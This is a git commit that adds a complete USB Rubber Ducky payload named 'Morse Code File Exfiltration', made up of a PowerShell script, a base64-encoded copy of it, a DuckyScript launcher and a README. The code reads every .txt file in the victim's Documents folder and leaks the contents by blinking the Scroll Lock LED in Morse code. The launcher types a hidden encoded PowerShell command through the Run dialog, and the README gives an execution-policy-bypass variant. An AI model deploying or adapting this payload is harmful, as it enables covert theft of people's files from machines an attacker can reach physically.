commit
1b8ddc8599
|
@ -0,0 +1,32 @@
|
|||
$o = New-Object -com wscript.shell;
|
||||
$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" };
|
||||
$l = '{SCROLLLOCK}';
|
||||
function flashy($t){
|
||||
$o.SendKeys($l);
|
||||
sleep -m ([int]$t);
|
||||
$o.SendKeys($l);
|
||||
#[console]::beep(600,([int]$t));
|
||||
sleep -m 300;
|
||||
}
|
||||
gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % {
|
||||
$v = $h[[string]$_];
|
||||
if ($v)
|
||||
{
|
||||
$v| % {$_[0..($_.length)]} | % {
|
||||
flashy((([int]([string]$_))*100));
|
||||
}
|
||||
}
|
||||
elseif ((!$v) -and !(([int]$_) -eq 32))
|
||||
{
|
||||
flashy(2700);
|
||||
$v = ([string]([int]$_));
|
||||
$v| % {$_[0..($_.length)]} | % {
|
||||
$h[[string]$_] | % {$_[0..($_.length)]} | % {
|
||||
flashy((([int]([string]$_))*100));
|
||||
}
|
||||
}
|
||||
}else{
|
||||
sleep -m 1200;
|
||||
}
|
||||
sleep -m 600;
|
||||
}
|
|
@ -0,0 +1 @@
|
|||
JABvACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAdwBzAGMAcgBpAHAAdAAuAHMAaABlAGwAbAA7ACAAJABoACAAPQAgAEAAewAgACIAMQAiAD0AIgAzADkAOQA5ADkAIgA7ACAAIgAyACIAPQAiADMAMwA5ADkAOQAiADsAIAAiADMAIgA9ACIAMwAzADMAOQA5ACIAOwAgACIANAAiAD0AIgAzADMAMwAzADkAIgA7ACAAIgA1ACIAPQAiADMAMwAzADMAMwAiADsAIAAiADYAIgA9ACIAOQAzADMAMwAzACIAOwAgACIANwAiAD0AIgA5ADkAMwAzADMAIgA7ACAAIgA4ACIAPQAiADkAOQA5ADMAMwAiADsAIAAiADkAIgA9ACIAOQA5ADkAOQAzACIAOwAgACIAMAAiAD0AIgA5ADkAOQA5ADkAIgA7ACAAIgBBACIAPQAiADMAOQAiADsAIAAiAEIAIgA9ACIAOQAzADMAMwAiADsAIAAiAEMAIgA9ACIAOQAzADkAMwAiADsAIAAiAEQAIgA9ACIAOQAzADMAIgA7ACAAIgBFACIAPQAiADMAIgA7ACAAIgBGACIAPQAiADMAMwA5ADMAIgA7ACAAIgBHACIAPQAiADkAOQAzACIAOwAgACIASAAiAD0AIgAzADMAMwAzACIAOwAgACIASQAiAD0AIgAzADMAIgA7ACAAIgBKACIAPQAiADMAOQA5ADkAIgA7ACAAIgBLACIAPQAiADkAMwA5ACIAOwAgACIATAAiAD0AIgAzADkAMwAzACIAOwAgACIATQAiAD0AIgA5ADkAIgA7ACAAIgBOACIAPQAiADkAMwAiADsAIAAiAE8AIgA9ACIAOQA5ADkAIgA7ACAAIgBQACIAPQAiADMAOQA5ADMAIgA7ACAAIgBRACIAPQAiADkAOQAzADkAIgA7ACAAIgBSACIAPQAiADMAOQAzACIAOwAgACIAUwAiAD0AIgAzADMAMwAiADsAIAAiAFQAIgA9ACIAOQAiADsAIAAiAFUAIgA9ACIAMwAzADkAIgA7ACAAIgBWACIAPQAiADMAMwAzADkAIgA7ACAAIgBXACIAPQAiADMAOQA5ACIAOwAgACIAWAAiAD0AIgA5ADMAMwA5ACIAOwAgACIAWQAiAD0AIgA5ADMAOQA5ACIAOwAgACIAWgAiAD0AIgA5ADkAMwAzACIAIAB9ADsAIAAkAGwAIAA9ACAAJwB7AFMAQwBSAE8ATABMAEwATwBDAEsAfQAnADsAIABmAHUAbgBjAHQAaQBvAG4AIABmAGwAYQBzAGgAeQAoACQAdAApAHsAIAAgACAAIAAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAKABbAGkAbgB0AF0AJAB0ACkAOwAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAMwAwADAAOwAgAH0AIABnAGMAaQAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACcATQB5AEQAbwBjAHUAbQBlAG4AdABzACcAKQApACAALQBmAGkAbABlACAALQByACAAKgAuAHQAeAB0ACAAfAAgACUAIAB7ACAAZwBjACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkALgBUAG8AVQBwAHAAZQByACgAKQB9ACAAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACQAdgAgAD0AIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AOwAgACAAIAAgACAAaQBmACAAKAAkAHYAKQAgACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABmAGwAYQBzAGgAeQAoACgAKABbAGkAbgB0AF0AKABbAHMAdAByAGkAbgBnAF0AJABfACkAKQAqADEAMAAwACkAKQA7ACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgAH0AIAAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAoACEAJAB2ACkAIAAtAGEAbgBkACAAIQAoACgAWwBpAG4AdABdACQAXwApACAALQBlAHEAIAAzADIAKQApACAAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgAGYAbABhAHMAaAB5ACgAMgA3ADAAMAApADsAIAAgACAAIAAgACAAIAAgACAAJAB2ACAAPQAgACgAWwBzAHQAcgBpAG4AZwBdACgAWwBpAG4AdABdACQAXwApACkAOwAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AIAB8ACAAJQAgAHsAJABfAFsAMAAuAC4AKAAkAF8ALgBsAGUAbgBnAHQAaAApAF0AfQAgAHwAIAAlACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZgBsAGEAcwBoAHkAKAAoACgAWwBpAG4AdABdACgAWwBzAHQAcgBpAG4AZwBdACQAXwApACkAKgAxADAAMAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgACAAIAAgACAAfQAgACAAIAAgACAAfQBlAGwAcwBlAHsAIAAgACAAIAAgACAAIAAgACAAIABzAGwAZQBlAHAAIAAtAG0AIAAxADIAMAAwADsAIAAgACAAIAAgAH0AIAAgACAAIAAgAHMAbABlAGUAcAAgAC0AbQAgADYAMAAwADsAIAAgAH0A
|
|
@ -0,0 +1,60 @@
|
|||
REM Title: Morse Code File Exfiltration
|
||||
REM Description: Reads all txt files in myDocs and Flashes the Scrolllock on and off to represent morse code
|
||||
REM Author: Cribbit
|
||||
REM Version: 1.2
|
||||
REM Category: Exfiltration
|
||||
REM Target: Windows (Powershell 5.1+)
|
||||
REM Attackmodes: HID & STORAGE
|
||||
REM Note: For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.0
|
||||
|
||||
REM Windows fully passive OS Detection and passive Detect Ready
|
||||
REM Includes its own passive detect ready. Does not require
|
||||
REM additional extensions
|
||||
|
||||
REM USAGE:
|
||||
REM Extension runs inline (here)
|
||||
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
REM boot delay
|
||||
REM $_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE MAX_WAIT 150
|
||||
DEFINE CHECK_INTERVAL 20
|
||||
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE NOT_WINDOWS 7
|
||||
|
||||
VAR $MAX_TRIES = MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
ELSE
|
||||
$_OS = NOT_WINDOWS
|
||||
END_IF
|
||||
|
||||
REM EXAMPLE USAGE AFTER EXTENSION
|
||||
REM IF ($_OS == WINDOWS) THEN
|
||||
REM STRING HELLO WINDOWS!
|
||||
REM ELSE
|
||||
REM STRING HELLO WORLD!
|
||||
REM END_IF
|
||||
END_EXTENSION
|
||||
|
||||
|
||||
IF ($_OS == WINDOWS)
|
||||
LED_GREEN
|
||||
REM Give explorer time to show
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRINGLN powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''DUCKY''').Name+'\b.txt')))
|
||||
ELSE
|
||||
LED_RED
|
||||
END_IF
|
||||
|
|
@ -0,0 +1,26 @@
|
|||
# :flashlight: Morse Code File Exfiltration
|
||||
* Author: Cribbit
|
||||
* Version: 1.2
|
||||
* Target: Windows (Powershell 5.1+)
|
||||
* Category: Exfiltration
|
||||
* Attackmode: HID & Storage
|
||||
|
||||
## :book: Description
|
||||
Reads all txt files in "my documents" and flashes the scroll lock on and off to represent Morse code of the English alphanumeric characters (0..9 A..Z)
|
||||
For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)
|
||||
|
||||
## :musical_note: Note
|
||||
This is not a very useful payload with limitation of morse code but I thought it was fun to create.
|
||||
|
||||
The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing.
|
||||
|
||||
Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious.
|
||||
|
||||
If you do not want to use the base64 version you could change the payload to:
|
||||
`RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''DUCKY''').Name+'payloads\\$SWITCH_POSITION\MorseCodeFileExfiltration.ps1')"`
|
||||
|
||||
|
||||
## :page_facing_up: Change Log
|
||||
| Version | Changes |
|
||||
| ------- | ------------------------------|
|
||||
| 1.2 | Ported from BashBunny Repo |
|
Loading…
Reference in New Issue